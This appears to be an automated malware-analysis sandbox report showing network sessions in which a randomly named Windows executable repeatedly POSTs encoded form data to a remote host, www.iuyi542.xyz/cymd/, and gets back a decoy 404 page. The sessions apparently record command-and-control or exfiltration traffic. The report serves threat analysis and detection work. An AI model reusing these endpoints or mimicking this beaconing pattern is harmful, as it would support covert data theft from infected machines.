                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      33192.168.2.45911438.47.237.27802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:51.137970924 CET783OUTPOST /cymd/ HTTP/1.1
                                                                                      Host: www.iuyi542.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.iuyi542.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.iuyi542.xyz/cymd/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 66 53 35 35 43 43 33 45 68 38 76 66 37 51 50 78 34 56 75 37 59 78 76 74 59 68 56 54 6f 47 51 6b 54 46 30 44 66 78 77 37 45 2b 33 74 65 35 33 70 46 31 48 45 4c 59 43 74 58 67 67 4e 77 67 70 46 54 59 6c 49 38 6d 56 32 4b 33 4b 4e 41 32 45 7a 57 5a 73 64 6a 6b 79 6d 58 50 51 42 63 4e 73 46 47 52 41 67 55 6c 48 35 72 58 63 68 41 30 54 79 63 6a 62 44 67 48 44 39 52 4f 4d 65 45 45 59 5a 39 6e 47 38 33 56 74 70 46 51 48 59 45 45 69 4f 44 6e 2b 4a 68 6a 33 69 6b 6b 69 30 74 6e 73 32 4d 61 71 79 4c 70 6c 68 4d 4b 6a 36 33 44 7a 61 52 58 63 41 4f 69 47 70 38 79 72 4f 68 71 66 6f 6c 41 3d 3d
                                                                                      Data Ascii: rP=fS55CC3Eh8vf7QPx4Vu7YxvtYhVToGQkTF0Dfxw7E+3te53pF1HELYCtXggNwgpFTYlI8mV2K3KNA2EzWZsdjkymXPQBcNsFGRAgUlH5rXchA0TycjbDgHD9ROMeEEYZ9nG83VtpFQHYEEiODn+Jhj3ikki0tns2MaqyLplhMKj63DzaRXcAOiGp8yrOhqfolA==
                                                                                      Nov 13, 2024 09:28:51.797152996 CET170INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:51 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 167433
                                                                                      Connection: close
                                                                                      ETag: "652641ca-28e09"
                                                                                      Nov 13, 2024 09:28:51.797168016 CET1236INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c
                                                                                      Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
                                                                                      Nov 13, 2024 09:28:51.797214985 CET212INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d
                                                                                      Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
                                                                                      Nov 13, 2024 09:28:51.797221899 CET1236INData Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64
                                                                                      Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
                                                                                      Nov 13, 2024 09:28:51.797225952 CET212INData Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d
                                                                                      Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
                                                                                      Nov 13, 2024 09:28:51.797233105 CET1236INData Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69
                                                                                      Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
                                                                                      Nov 13, 2024 09:28:51.797303915 CET212INData Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65
                                                                                      Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
                                                                                      Nov 13, 2024 09:28:51.797312021 CET1236INData Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75
                                                                                      Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
                                                                                      Nov 13, 2024 09:28:51.797319889 CET212INData Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d
                                                                                      Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
                                                                                      Nov 13, 2024 09:28:51.797456980 CET1236INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d
                                                                                      Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
                                                                                      Nov 13, 2024 09:28:51.802371025 CET1236INData Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31
                                                                                      Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      34192.168.2.45911538.47.237.27802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:53.691234112 CET803OUTPOST /cymd/ HTTP/1.1
                                                                                      Host: www.iuyi542.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.iuyi542.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.iuyi542.xyz/cymd/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 66 53 35 35 43 43 33 45 68 38 76 66 36 78 2f 78 6a 79 61 37 50 42 76 69 58 42 56 54 78 57 51 67 54 46 34 44 66 77 30 72 45 73 44 74 65 5a 48 70 45 30 48 45 49 59 43 74 50 51 67 45 30 67 6f 4a 54 59 68 71 38 6b 52 32 4b 7a 69 4e 41 32 55 7a 57 71 55 65 73 55 79 6b 63 76 51 35 43 39 73 46 47 52 41 67 55 6c 54 66 72 57 34 68 41 6b 6a 79 64 42 6a 43 6d 33 44 79 62 75 4d 65 57 30 59 56 39 6e 47 65 33 55 68 50 46 53 2f 59 45 42 4f 4f 44 32 2b 57 72 6a 32 6e 71 45 6a 30 38 6b 4a 63 55 62 6a 36 55 49 70 75 50 35 33 32 37 6c 2b 41 41 6d 39 58 63 69 69 61 68 31 69 36 73 70 69 68 2b 4e 41 45 37 65 48 71 63 68 79 73 46 4f 4b 57 56 36 32 53 66 38 77 3d
                                                                                      Data Ascii: rP=fS55CC3Eh8vf6x/xjya7PBviXBVTxWQgTF4Dfw0rEsDteZHpE0HEIYCtPQgE0goJTYhq8kR2KziNA2UzWqUesUykcvQ5C9sFGRAgUlTfrW4hAkjydBjCm3DybuMeW0YV9nGe3UhPFS/YEBOOD2+Wrj2nqEj08kJcUbj6UIpuP5327l+AAm9Xciiah1i6spih+NAE7eHqchysFOKWV62Sf8w=
                                                                                      Nov 13, 2024 09:28:54.330128908 CET170INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:54 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 167433
                                                                                      Connection: close
                                                                                      ETag: "652641ca-28e09"
                                                                                      Nov 13, 2024 09:28:54.330149889 CET1236INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c
                                                                                      Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
                                                                                      Nov 13, 2024 09:28:54.330200911 CET212INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d
                                                                                      Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
                                                                                      Nov 13, 2024 09:28:54.330214024 CET1236INData Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64
                                                                                      Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
                                                                                      Nov 13, 2024 09:28:54.330229998 CET212INData Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d
                                                                                      Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
                                                                                      Nov 13, 2024 09:28:54.330421925 CET1236INData Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69
                                                                                      Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
                                                                                      Nov 13, 2024 09:28:54.330435038 CET212INData Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65
                                                                                      Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
                                                                                      Nov 13, 2024 09:28:54.330450058 CET1236INData Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75
                                                                                      Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
                                                                                      Nov 13, 2024 09:28:54.330463886 CET212INData Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d
                                                                                      Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
                                                                                      Nov 13, 2024 09:28:54.330952883 CET1236INData Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d
                                                                                      Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
                                                                                      Nov 13, 2024 09:28:54.335066080 CET1236INData Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31
                                                                                      Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      35192.168.2.45911638.47.237.27802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:56.243518114 CET10885OUTPOST /cymd/ HTTP/1.1
                                                                                      Host: www.iuyi542.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.iuyi542.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.iuyi542.xyz/cymd/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 66 53 35 35 43 43 33 45 68 38 76 66 36 78 2f 78 6a 79 61 37 50 42 76 69 58 42 56 54 78 57 51 67 54 46 34 44 66 77 30 72 45 73 62 74 65 72 50 70 4c 33 66 45 4a 59 43 74 52 67 67 42 30 67 70 54 54 5a 46 75 38 6b 64 49 4b 31 6d 4e 44 56 73 7a 51 62 55 65 33 6b 79 6b 54 50 51 43 63 4e 73 4d 47 52 77 73 55 6c 44 66 72 57 34 68 41 6d 37 79 55 7a 62 43 6b 33 44 39 52 4f 4d 73 45 45 5a 49 39 6e 65 30 33 55 30 30 45 68 33 59 45 67 69 4f 46 45 57 57 32 7a 32 6c 70 45 6a 61 38 6b 31 48 55 66 4c 63 55 4a 73 44 50 34 50 32 71 54 44 61 54 31 35 44 66 68 4b 49 37 31 2b 2b 31 37 69 79 35 50 30 6f 72 39 50 45 4a 53 76 42 43 63 37 39 51 36 47 4e 4d 49 49 64 43 7a 73 41 77 34 67 4e 68 7a 57 62 6b 37 4d 53 71 4b 31 4d 2f 4f 70 30 5a 49 67 6d 45 6e 38 4c 37 6b 37 79 49 33 69 5a 65 45 59 61 4f 51 30 33 32 43 2f 70 65 32 4b 46 30 56 30 76 6b 6b 2b 35 37 51 49 66 39 7a 7a 54 7a 36 56 63 51 78 78 2f 4b 35 52 77 73 39 47 34 4d 41 6f 49 2b 65 48 6a 56 71 30 31 4a 36 42 73 4d 50 64 46 64 73 6c 75 41 41 38 76 73 54 53 [TRUNCATED]
                                                                                      Data Ascii: rP=fS55CC3Eh8vf6x/xjya7PBviXBVTxWQgTF4Dfw0rEsbterPpL3fEJYCtRggB0gpTTZFu8kdIK1mNDVszQbUe3kykTPQCcNsMGRwsUlDfrW4hAm7yUzbCk3D9ROMsEEZI9ne03U00Eh3YEgiOFEWW2z2lpEja8k1HUfLcUJsDP4P2qTDaT15DfhKI71++17iy5P0or9PEJSvBCc79Q6GNMIIdCzsAw4gNhzWbk7MSqK1M/Op0ZIgmEn8L7k7yI3iZeEYaOQ032C/pe2KF0V0vkk+57QIf9zzTz6VcQxx/K5Rws9G4MAoI+eHjVq01J6BsMPdFdsluAA8vsTSbR59qYAu7ccj09Q1d/ZTySX4PazeTwUID0jXwThWDUvluDjYBjDX90i+xfeYlQrdmTX3cpjl+uH5GWhDiDTzQb97aX1Pc8oryggoALLRUk1cPt8cIPsluHKQpH9DBhvS/or+Rj2UN2hli4slZYV/DJe9clAjsHN+nd79fSNPB9P5MEaGAX3x1fIwceYsBZdSOdNo2yhVk8X0hV4wCsS9QzUipEdHEhuU5eH0xeTk7tywHmPrwNEhRvYrs64UyDUMDOMohLQ7hnvCMbk3PPYwRDSHULEnXj6/orVnKp1q72dQRidMy13Cnci7ndOYNwRJFTlgM8Vrgahfmax8wreNaOZ71kbpJnlwqoAN81XynrrE14Mh3/uZpkIg2VfoBDh0oRoSUSF5keNgtr3RhO7LGxWv4FgTHeR3wwDTPIoJ2zrvTLmR+stxHtkVK0OuTDLE6xDdElQ/lQZaept/DWXOsS9iUsXKwWZa7zV01TJcAoV0gDNbWEo2dDOZA7DDG/oojEOV3LylD4pgVvidyW6ExkRnezi+4WYMj7f4CZ6Ey/B+2TJCKkMvyV3YrjFuFg1Ac2f9C2ya4kAwGe7CqjOPVLE69euVsXJ5UZFzzaICrHoeyCEwf1VNb5xJPg5QEKdW7tJWghNaLE3AXnNFwZ3CJAsoQCrPfjVfR/ [TRUNCATED]
                                                                                      Nov 13, 2024 09:28:56.905841112 CET170INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:56 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 167433
                                                                                      Connection: close
                                                                                      ETag: "652641ca-28e09"
                                                                                      Nov 13, 2024 09:28:56.905881882 CET1236INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c
                                                                                      Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
                                                                                      Nov 13, 2024 09:28:56.905920029 CET212INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d
                                                                                      Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
                                                                                      Nov 13, 2024 09:28:56.905993938 CET1236INData Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64
                                                                                      Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
                                                                                      Nov 13, 2024 09:28:56.906011105 CET212INData Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d
                                                                                      Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
                                                                                      Nov 13, 2024 09:28:56.906162024 CET1236INData Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69
                                                                                      Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
